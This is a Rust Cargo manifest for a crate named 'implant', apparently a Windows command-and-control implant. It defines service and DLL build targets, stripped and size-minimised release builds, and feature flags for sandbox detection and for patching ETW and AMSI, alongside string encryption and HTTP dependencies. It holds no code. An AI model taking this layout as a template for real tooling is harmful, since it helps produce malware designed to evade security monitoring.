[package]
name = "implant"
version = "0.1.0"
edition = "2024"
build = "build.rs"

[profile.release]
opt-level = "z"
lto = "fat"
strip = "symbols"
panic = "abort"
debug = 0
split-debuginfo = "off"

[[bin]]
name = "implant"
path = "src/main.rs"

[[bin]]
name = "implant_svc"
path = "src/main_svc.rs"

[lib]
name = "implant"
path = "src/lib.rs"
crate-type = ["cdylib"]

[features]
sandbox_trig = []
sandbox_mem = []
patch_etw = []
patch_amsi = []

[dependencies]
shared ={ path = "../shared" }
serde = {version = "1.0", features = ["derive"] }
serde_json = "1"
str_crypter = "1.0.3"
cgmath = "0.18.0"
windows-sys = {version = "0.61", features = [
    "Win32",
    "Win32_Foundation",
    "Win32_NetworkManagement_NetManagement",
    "Win32_Storage_FileSystem",
    "Win32_System_ProcessStatus",
    "Win32_System_SystemInformation",
    "Win32_System_Threading",
    "Win32_System_WindowsProgramming",
    "Win32_System_SystemServices",
    "Win32_Security",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Services",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_Ole",
    "Win32_System_Variant",
    "Win32_System_ClrHosting",
    "Win32_System_Com",
    "Win32_System_Console",
    "Win32_System_IO",
    "Win32_System_Pipes",
]}
rand = "0.9"
windows-registry = "0.6"
chrono = { version = "0.4", features = ["serde"] }
reqwest = { version = "0.12.25", features = ["json", "blocking", "stream"]}
